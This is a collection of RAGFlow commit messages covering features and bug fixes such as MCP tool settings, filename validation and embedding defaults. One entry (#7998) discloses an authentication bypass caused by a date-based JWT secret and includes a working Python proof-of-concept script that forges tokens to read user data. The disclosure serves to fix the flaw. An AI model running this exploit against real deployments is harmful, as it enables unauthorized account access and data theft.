Feat: allow users to choose which MCP tools are enabled (#8519)
### What problem does this PR solve?
Allow users to choose which MCP tools are enabled.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
stack:
```
2025-06-26 17:22:24,739 ERROR 1609 list index out of range
Traceback (most recent call last):
File "/ragflow/.venv/lib/python3.10/site-packages/flask/app.py", line 880, in full_dispatch_request
rv = self.dispatch_request()
File "/ragflow/.venv/lib/python3.10/site-packages/flask/app.py", line 865, in dispatch_request
return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) # type: ignore[no-any-return]
File "/ragflow/api/utils/api_utils.py", line 298, in decorated_function
return func(*args, **kwargs)
File "/ragflow/api/apps/sdk/session.py", line 472, in list_session
print(conv["reference"][message_num])
IndexError: list index out of range
```

### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Fix chunk number error after re-parsing. #8503.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Fix: Add input validation to chunk creation endpoint (#8516)
### What problem does this PR solve?
- Include optional `tag_feas` field if present in request
- Add input validation for `important_kwd` and `question_kwd` to ensure
they are lists
- #8462
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Feat: add MCP dashboard functionalities list_tools and test_tool (#8505)
### What problem does this PR solve?
Add MCP dashboard functionalities list_tools and test_tool.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Fix: Enforce default embedding model in create_dataset / update_dataset (#8486)
### What problem does this PR solve?
Previous:
- Defaulted to hardcoded model 'BAAI/bge-large-zh-v1.5@BAAI'
- Did not respect user-configured default embedding_model
Now:
- Correctly prioritizes user-configured default embedding_model
Other:
- Make embedding_model optional in CreateDatasetReq with proper None
handling
- Add default embedding model fallback in dataset update when empty
- Enhance validation utils to handle None values and string
normalization
- Update SDK default embedding model to None to match API changes
- Adjust related test cases to reflect new validation rules
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Fix: some cases Task return but not set progress (#8469)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/8466
I go through the codes, current logic:
When do_handle_task raises an exception, handle_task will set the
progress, but for some cases do_handle_task internal will just return
but not set the right progress, at this cases the redis stream will been
acked but the task is running.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Add MCP server dashboard operations.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
before refactor
1. create file record
2. Add to blob
if have some execption at 2 the system db will have a file record but
not have related blob, which will introduce some bug.
after refactor
1. add to blob
2. create file record.
if 1 success but 2 failed just have a dirty blob in blob system, user
will not feel that
### Type of change
- [x] Refactoring
### What problem does this PR solve?
This is a cherry-pick from #7781 as requested.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
Fix: Document parse via API will alot problen (#8407)
### What problem does this PR solve?
#8391#8404
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
Fix: code debug may corrupt by history answer (#8385)
### What problem does this PR solve?
Fix code debug may corrupt by history answer.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Correct boolean parsing for 'desc' parameter in document_app.py to
properly handle string values
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Fix typo in dataset name length error message (#8351)
### What problem does this PR solve?
Fixes a minor grammar issue in a user-facing error message. The original
message said "large than" instead of the correct comparative form
"larger than". Just a quick fix I noticed while reading the code.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Refa: Implement centralized file name length limit using FILE_NAME_LEN_LIMIT constant (#8318)
### What problem does this PR solve?
- Replace hardcoded 255-byte file name length checks with
FILE_NAME_LEN_LIMIT constant
- Update error messages to show the actual limit value
- #8290
### Type of change
- [x] Refactoring
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
Fix: Add validation for empty filenames in document_app.py (#8321)
### What problem does this PR solve?
- Add validation for empty filenames in document_app.py and trim
whitespace
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Add filename length validation (<=255 bytes) for document
upload/rename in both HTTP and SDK APIs
- Update error messages for consistency
- Fix comparison operator in SDK from '>=' to '>' for filename length
check
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Fix: avoid mixing different embedding models in document parsing (#8260)
### What problem does this PR solve?
Fix mixing different embedding models in document parsing.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Progress is only updated if it's valid and not regressive.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Fix boolean parsing for 'desc' parameter in kb_app.py to properly
handle string values
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Fix: Move pagerank field from create to update dataset API (#8217)
### What problem does this PR solve?
- Remove pagerank from CreateDatasetReq and add to UpdateDatasetReq
- Add pagerank update logic in dataset update endpoint
- Update API documentation to reflect changes
- Modify related test cases and SDK references
#8208
This change makes pagerank a mutable property that can only be set after
dataset creation, and only when using elasticsearch as the doc engine.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Fix: Add pagerank validation for non-elasticsearch doc engines (#8215)
### What problem does this PR solve?
Validate that pagerank updates are only allowed when using elasticsearch
as the document engine. Return an error if pagerank is set while using a
different doc engine, preventing potential inconsistencies in document
scoring.
#8208
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Fix: Add validation for dataset name in KB update API (#8194)
### What problem does this PR solve?
Validate dataset name in knowledge base update endpoint to ensure:
- Name is a non-empty string
- Name length doesn't exceed DATASET_NAME_LIMIT
- Whitespace is trimmed before processing
Prevents invalid dataset names from being saved and provides clear error
messages.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Fix: duplicate knowledgebase name validation logic (#8199)
### What problem does this PR solve?
Change the condition from checking for >1 to >=1 when validating
duplicate knowledgebase names to properly catch all duplicates. This
ensures no two knowledgebases can have the same name for a tenant.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Fix: Improve dataset name validation in KB app (#8188)
### What problem does this PR solve?
- Trim whitespace before checking for empty dataset names
- Change length check from >= to > DATASET_NAME_LIMIT for consistency
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Fix: When List Kbs some times the total is wrong (#8151)
### What problem does this PR solve?
for kb.app list method when owner_ids the total calculate is wrong (now
will base on the paged result to calculate total)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Fix: use jwks_uri from OIDC metadata for JWKS client (#8136)
### What problem does this PR solve?
Issue: #8051
The current implementation assumes JWKS endpoints follow the standard
`/.well-known/jwks.json` convention. This breaks authentication for OIDC
providers that use non-standard JWKS paths, resulting in 404 errors
during token validation.
Root Cause Analysis
- The OpenID Connect specification doesn't mandate a fixed path for JWKS
endpoints
- Some identity providers (like certain Keycloak configurations) use
custom endpoints
- Our previous approach constructed JWKS URLs by convention rather than
discovery
### Solution Approach
Instead of constructing JWKS URLs by appending to the issuer URI, we
now:
1. Properly leverage the `jwks_uri` from the OIDC discovery metadata
2. Honor the identity provider's actual configured endpoint
```python
# Before (fragile approach)
jwks_url = f"{self.issuer}/.well-known/jwks.json"
# After (standards-compliant)
jwks_cli = jwt.PyJWKClient(self.jwks_uri) # Use discovered endpoint
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Refa: dataset operations to simplify error handling (#8132)
### What problem does this PR solve?
- Consolidate database operations within single try-except blocks in the
methods
### Type of change
- [x] Refactoring
Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998)
### Description
There's a critical authentication bypass vulnerability that allows
remote attackers to gain unauthorized access to user accounts without
any credentials. The vulnerability stems from two security flaws: (1)
the application uses a predictable `SECRET_KEY` that defaults to the
current date, and (2) the authentication mechanism fails to properly
validate empty access tokens left by logged-out users. When combined,
these flaws allow attackers to forge valid JWT tokens and authenticate
as any user who has previously logged out of the system.
The authentication flow relies on JWT tokens signed with a `SECRET_KEY`
that, in default configurations, is set to `str(date.today())` (e.g.,
"2025-05-30"). When users log out, their `access_token` field in the
database is set to an empty string but their account records remain
active. An attacker can exploit this by generating a JWT token that
represents an empty access_token using the predictable daily secret,
effectively bypassing all authentication controls.
### Source - Sink Analysis
**Source (User Input):** HTTP Authorization header containing
attacker-controlled JWT token
**Flow Path:**
1. **Entry Point:** `load_user()` function in `api/apps/__init__.py`
(Line 142)
2. **Token Processing:** JWT token extracted from Authorization header
3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from
`api/settings.py` (Line 123)
4. **Database Query:** `UserService.query()` called with decoded empty
access_token
5. **Sink:** Authentication succeeds, returning first user with empty
access_token
### Proof of Concept
```python
import requests
from datetime import date
from itsdangerous.url_safe import URLSafeTimedSerializer
import sys
def exploit_ragflow(target):
# Generate token with predictable key
daily_key = str(date.today())
serializer = URLSafeTimedSerializer(secret_key=daily_key)
malicious_token = serializer.dumps("")
print(f"Target: {target}")
print(f"Secret key: {daily_key}")
print(f"Generated token: {malicious_token}\n")
# Test endpoints
endpoints = [
("/v1/user/info", "User profile"),
("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing")
]
auth_headers = {"Authorization": malicious_token}
for path, description in endpoints:
print(f"Testing {description}...")
response = requests.get(f"{target}{path}", headers=auth_headers)
if response.status_code == 200:
data = response.json()
if data.get("code") == 0:
print(f"SUCCESS {description} accessible")
if "user" in path:
user_data = data.get("data", {})
print(f" Email: {user_data.get('email')}")
print(f" User ID: {user_data.get('id')}")
elif "file" in path:
files = data.get("data", {}).get("files", [])
print(f" Files found: {len(files)}")
else:
print(f"Access denied")
else:
print(f"HTTP {response.status_code}")
print()
if __name__ == "__main__":
target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost"
exploit_ragflow(target_url)
```
**Exploitation Steps:**
1. Deploy RAGFlow with default configuration
2. Create a user and make at least one user log out (creating empty
access_token in database)
3. Run the PoC script against the target
4. Observe successful authentication and data access without any
credentials
**Version:** 0.19.0
@KevinHuSh@asiroliu@cike8899
Co-authored-by: nkoorty <amalyshau2002@gmail.com>
Feat: Allow update conversation parameters and persist to database in completion (#8039)
### What problem does this PR solve?
This PR updates the completion function to allow parameter updates when
a session_id exists. It also ensures changes are saved back to the
database via API4ConversationService.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Update upload filename length limit from 128 to 256, which is aligned with os (#7971)
### What problem does this PR solve?
Change filename length limit from 128 to 256
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
Fix: Prevent Flask hot reload from hanging due to early thread startup (#7966)
**Fix: Prevent Flask hot reload from hanging due to early thread
startup**
### What problem does this PR solve?
When running the Flask server with `use_reloader=True` (enabled during
debug mode), modifying a Python source file would trigger a reload
detection (`Detected change in ...`), but the application would hang
instead of restarting cleanly.
This was caused by the `update_progress` background thread being started
**too early**, often within the main module scope.
This issue was reported in
[#7498](https://github.com/infiniflow/ragflow/issues/7498).
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---
**Summary of changes:**
- Wrapped `update_progress` launch in a `threading.Timer` with delay to
avoid premature thread execution.
- Marked thread as `daemon=True` to avoid blocking process exit.
- Added `WERKZEUG_RUN_MAIN` environment check to ensure background
threads only run in the reloader child process (the actual Flask app).
- Retained original behavior in production mode (`debug=False`).
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>